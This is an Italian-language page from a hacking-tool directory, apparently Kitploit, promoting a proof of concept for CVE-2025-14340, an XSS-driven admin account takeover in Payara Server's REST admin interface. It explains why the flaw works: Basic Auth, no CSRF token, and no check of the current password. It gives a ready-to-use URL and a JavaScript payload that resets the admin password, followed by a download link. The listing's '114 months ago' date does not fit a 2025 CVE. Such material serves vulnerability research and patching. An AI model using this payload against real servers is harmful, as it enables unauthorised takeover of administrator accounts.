Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-14340 — PoC for CVE-2025-14340: Admin account takeover in Payara Server | Kitploit
Strumenti/GitHubGitHub/deepsecurityresearch/cve-2025-14340
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubdeepsecurityresearch/cve-2025-14340

CVE-2025-14340

PoC for CVE-2025-14340: Admin account takeover in Payara Server

Vedi Repository
114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

XSS per appropriazione dell'account admin (CVE-2025-14340)

Una vulnerabilità di Cross-Site Scripting nell'Interfaccia REST di Amministrazione di Payara permette l'esecuzione di JavaScript controllato dall'attaccante, portando all'appropriazione dell'account admin. A causa di:

  1. Il pannello utilizza HTTP Basic Auth (le credenziali vengono inviate automaticamente dal browser per richieste same-origin).
  2. L'endpoint change-admin-password non richiede la password corrente per aggiornare la password di un utente.
  3. Il form change-admin-password non ha protezione CSRF.
  4. Uno script iniettato sfruttando l'XSS in /management/domain/version può fare una POST a /management/domain/change-admin-password e impostare una password scelta dall'attaccante per qualsiasi account target — risultando nell'appropriazione dell'account admin.

Dimostrazione del concetto

URL:

https://panel.example.com:4848/management/domain/version?<PAYLOAD>

PAYLOAD:

root@kitploit:~
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>

Legale

SOLO USO AUTORIZZATO. DeepSecurity Perú non approva l'accesso non autorizzato e non si assume alcuna responsabilità per qualsiasi uso improprio delle informazioni fornite.

Scarica lo strumento